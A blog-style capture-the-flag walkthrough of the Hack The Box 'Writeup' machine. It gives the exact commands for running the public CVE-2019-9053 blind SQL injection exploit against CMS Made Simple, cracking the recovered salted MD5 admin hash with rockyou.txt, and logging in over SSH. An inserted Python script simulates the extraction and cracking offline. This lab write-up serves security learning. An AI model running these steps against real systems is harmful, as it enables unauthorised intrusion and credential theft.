SQL Injection Exploitation & Hash Cracking!

Steven Petty
5 min read · Nov 20, 2019


Photo by Caspar Camille Rubin on Unsplash

Summary

Waddup #InfoSec! In this article I am going to be doing Part 1 of a write-up for Hack The Box’s “Writeup” box! This was a fun one, and while I didn’t necessarily learn any new hacking techniques, I did build on my previous knowledge of SQL Injection, Hash Cracking, and actually quite a bit regarding how $PATH works within Linux. #spoilers

As always, please feel free to hack along with me, as I write these to be very interactive and “step” driven. #HackTogetherHackHarder

Shhhh… You hear that?

#YouKnowWhatTimeItIs! Time for that Reconnaissance phase. We’ll be setting our cross-hairs on 10.10.10.138 once we are successfully VPN’ed into HTB’s network. Of course our first step is going to be a basic nmap scan. We are going to use our basic switches:

-sV: This gives us the version of the service running on each open port.
-sC: This runs the default NSE scripts, which can be useful for additional artifact discovery (the robots.txt detail below comes from one of them).

So at first glance pretty standard: we have SSH and HTTP ports open, which of course must mean there is a web app running on the box, right? →

Totally did NOT have a mini stroke thinking this was a BSOD…on linux… #ineedsleep

Now let’s see here, what can we gather from just a first glance at this page? Well, there must be some kind of WAF (Web Application Firewall) in place, as they so graciously warned us. Looks like there is a threshold of acceptable 40x errors before the server will ban your IP. In case you are unfamiliar with HTTP status codes, I refer you to the best IT-related cheat sheet I have ever seen… http.cat. TL;DR: 4xx status codes mean the server is blaming the client, such as a bad/invalid request (400) or a path that doesn’t exist (404). Thus if we send too many invalid requests to this server, it looks like WE are getting #ByeFelica’d.

With that knowledge it appears that directory enumeration is out, as every guessed path that doesn’t exist is a 404, and a wordlist of a few thousand entries would blow through that 40x limit in seconds (throttling the request rate doesn’t help, since the ban is about the count of errors, not how fast they arrive). If we take a peek back at the nmap results, you can see the default http-robots.txt script provided some details about the server’s robots.txt file, which is disallowing indexing of the /writeup/ directory. Welp, let’s make like a tree and go see what potential application and/or web service is running at that URL…

AH! Now it gets interesting: it appears to be someone’s very, very rough blog for HTB writeups. Clicking around, there are a few noteworthy items we come across. First, we see at the footer of each page “Pages are hand-crafted with vim. NOT.”. Now at this point I am unsure if this is some kind of hint or just a reference to the all-great Borat…

*again #IneedSleep

Other than that, 2 things stand out to me:

1. The URL for each page carries a parameter that looks like it is fed straight into a SQL query against the backend database, which is how the server fetches and returns the page contents. Anything that goes from the URL into a query that directly is worth testing for injection.

2. Reviewing the source code behind these pages shows that the application “CMS Made Simple” is being used as the content management system.

Weaponization

We now have enough information to at least attempt to proceed with our hack! Let’s start by checking out what exploits are available to us for the CMS Made Simple application:

Looking at searchsploit we see 1 particular script that stands out. We already suspect the site may be vulnerable to SQL Injection from how it queries for page contents, and as luck would have it, there’s a CMS Made Simple exploit leveraging SQL Injection. #jackpot

So let’s copy this script over to our directory and crack it open to take a look at what it’s doing. You can use the following searchsploit command (-m mirrors the exploit file) to copy the script into your current directory:

searchsploit -m exploits/php/webapps/46635.py

The script is pretty long, so to save time and to not bombard you with a wall of code I will just link to it here. For your reference, this script is an exploit for CVE-2019-9053, an unauthenticated, time-based blind SQL injection in the CMS Made Simple News module!

If you read through the code you will see that sure enough it injects SQL into a URL parameter to pull any and all data it can, specifically the site-wide salt, the admin username, the admin password hash, and the email address. Because the injection is blind, the script recovers each value one character at a time by making the database sleep() when a guess is right and timing the response, which is also why it is not fast. And the great thing about this script is no modifications needed! Although I still strongly recommend you read through every line of code, as you ALWAYS want to have a good understanding of what your script does before firing it. Otherwise it could get you into some trouble.
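To make concrete what that script does under the hood, here is an added example (my own code, not from the article and not the 46635.py exploit) that simulates both halves of it against a constructed in-memory “database”: the blind, character-by-character extraction, using a plain yes/no oracle in place of the sleep()-timing check the real exploit performs, and the offline crack of the recovered hash with the md5(salt + password) scheme CMS Made Simple uses for admin passwords. The salt, account, password and wordlist are all made up for the example.

```python
import hashlib
import string

# Added example, not code from the article or from the 46635.py exploit.
# It reproduces in miniature the two things that script does:
#   1. blind extraction of a value one character at a time through an oracle
#      that only answers yes/no (the real exploit injects sleep() and reads
#      the answer from the response time), and
#   2. an offline dictionary attack on the recovered admin hash, using the
#      CMS Made Simple scheme md5(salt + password).
# Everything below is constructed: the "database", the salt, the password
# and the wordlist. Nothing touches the network.

# Characters the extractor will try at each position. Hex, usernames and
# e-mail addresses are all covered; extend it if a target value needs more.
CHARSET = string.digits + string.ascii_lowercase + "@._-"

CONSTRUCTED_SALT = "f3a9c1d7e5b24680"      # stands in for the site-wide salt
CONSTRUCTED_PASSWORD = "supersecret2019"   # what our fictional admin chose


def cmsms_hash(salt, password):
    """CMS Made Simple stores admin passwords as md5(salt + password)."""
    return hashlib.md5((salt + password).encode()).hexdigest()


# The four values the exploit goes after, as they would sit in the database.
CONSTRUCTED_DB = {
    "salt": CONSTRUCTED_SALT,
    "username": "admin",
    "email": "admin@example.com",
    "password": cmsms_hash(CONSTRUCTED_SALT, CONSTRUCTED_PASSWORD),
}

CONSTRUCTED_WORDLIST = ["123456", "password", "letmein", "supersecret2019", "qwerty"]


def make_oracle(db, column):
    """Return a function answering the one question a blind injection can ask:
    does `column` start with `prefix`?  (Think `... LIKE 'prefix%'`.)  In the
    real exploit that answer is carried by whether the injected sleep() fired."""
    def oracle(prefix):
        return db[column].startswith(prefix)
    return oracle


def extract_blind(oracle, charset=CHARSET, max_len=64):
    """Recover a value using only yes/no answers. Each position costs up to
    len(charset) questions, and the real exploit pays a sleep() delay per
    question, which is why pulling a 32-character hash takes a while."""
    found = ""
    for _ in range(max_len):
        for ch in charset:
            if oracle(found + ch):
                found += ch
                break
        else:
            # No character extends the prefix, so the value is complete.
            return found
    return found


def crack(salt, target_hash, wordlist):
    """Offline dictionary attack: hash each candidate with the recovered salt
    and compare. Returns the plaintext or None. A single site-wide salt only
    defeats precomputed tables; it does nothing against a wordlist run."""
    for word in wordlist:
        if cmsms_hash(salt, word) == target_hash:
            return word
    return None


def dump_and_crack(db, wordlist):
    """End-to-end: extract the same four columns the exploit does, then crack."""
    dumped = {col: extract_blind(make_oracle(db, col))
              for col in ("salt", "username", "email", "password")}
    dumped["cracked"] = crack(dumped["salt"], dumped["password"], wordlist)
    return dumped


if __name__ == "__main__":
    for key, value in dump_and_crack(CONSTRUCTED_DB, CONSTRUCTED_WORDLIST).items():
        print(f"{key:>9}: {value}")
```

The point to take away is in `crack`: once the salt has leaked alongside the hash, the only thing standing between the attacker and the admin password is how guessable that password is, and MD5 is cheap enough that a wordlist the size of rockyou.txt is a matter of seconds.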

With that said, all we need to run this script against our vulnerable target is some arguments! It specifically needs the target URL and the wordlist we would like to use to crack the recovered hash. If you are hacking away at this box in Kali then the good news is you have your pick of wordlists from the /usr/share/wordlists directory (on a fresh install rockyou.txt still needs to be extracted from rockyou.txt.gz first). Two caveats: the script was written for Python 2, so on a newer Kali invoke it with python2 if plain python is Python 3, and the -u argument is the base URL of the CMS install, not the page you were browsing. Here is the command that we are going to use:

python exploit.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt

AND DRUMROLLLLLL………………………………..

#ThatsHowTheCookieCrumbles

It looks like we mayyyy have our credentials for a user shell >:) so let’s give it a try by SSHing in with the cracked password (the CMS admin password being accepted for a system account is plain old password reuse, which is exactly why cracking the hash was worth the wait):

#boomski! We now have a user shell on the box :) As always, it doesn’t stop here! We always aspire to be the #GreedyHacker and aren’t finished until we pop root, buttttt we’ll cover that process in the next writeup!

If you made it this far then I sincerely appreciate you reading and hacking along! Feel free to give me a shout on Twitter @PettyHacks or comment below what you thought and possibly what you’d like to see in the future! #ByeFelica!
